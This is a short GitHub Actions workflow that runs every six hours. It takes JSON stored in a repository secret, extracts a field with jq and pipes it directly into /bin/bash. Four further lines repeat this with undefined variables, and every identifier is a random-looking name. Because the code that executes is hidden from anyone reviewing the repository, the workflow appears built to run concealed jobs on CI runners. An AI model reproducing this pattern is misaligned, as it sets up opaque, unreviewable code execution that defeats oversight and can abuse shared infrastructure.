name: dayeweiguo

on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'

jobs:  # 11047
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dayeweiguo
        env:
          sr1797: ${{ secrets.sr1797 }}
        run: |
          echo $sr1797 | jq -r .fin3 | /bin/bash
          echo $nnl77154 | jq -r .x5 | /bin/bash
          echo $y1161 | jq -r .o1313 | /bin/bash
          echo $x69350 | jq -r .y01 | /bin/bash
          echo $fc23922 | jq -r .lvbp9099 | /bin/bash

